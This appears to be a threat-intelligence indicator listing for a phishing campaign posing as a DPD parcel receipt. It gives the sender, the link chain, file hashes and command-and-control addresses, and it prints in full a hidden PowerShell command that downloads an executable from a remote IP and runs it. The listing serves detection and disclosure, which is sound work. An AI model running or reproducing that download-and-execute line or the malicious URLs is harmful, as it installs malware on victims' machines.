- SENDER:
- adriana.frasure.5248@hotmail.com
- SUBJECT:
- DPD e-service: Carriere you have new receipt #5905220254
- LINK:
- http://bit.ly/2BJ2mLv ->
- http://556131[.]canadaservicetd.com/inv/19354667/480266839 ->
- http://dl.dropboxusercontent.com/s/y9b6nuojqa42v8b/package_receipt_940012650941854636376.zip
- ZIP DELIVERED:
- 1efe980c7c594f088265d9f27b24edbb (package_receipt_940012650941854636376.zip)
- JS IN ZIP:
- 643fba70526ac7586e80a17b19721f19 (package_receipt_023396501534971627860.js)
- POSH CALLOUT:
- http://185.213.208.103/forum.php?KWDJrXB
- DROPS / RUNS RoamingDsh83.exe:
- powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass (new-object system.net.webclient).downloadfile('http://185.213.208.103/forum.php?KWDJrXB','%USERPROFILE%\AppData\RoamingDsh83.exe'); sTart-procesS '%USERPROFILE%\AppData\RoamingDsh83.exe'
- PAYLOAD:
- 1c5de35eb197140bb03cd165c18da3cb (RoamingDsh83.exe)
- C2:
- 37.220.31.120:443
- 89.223.29.34:443
- 89.223.26.215:443
- checkbox.bit:443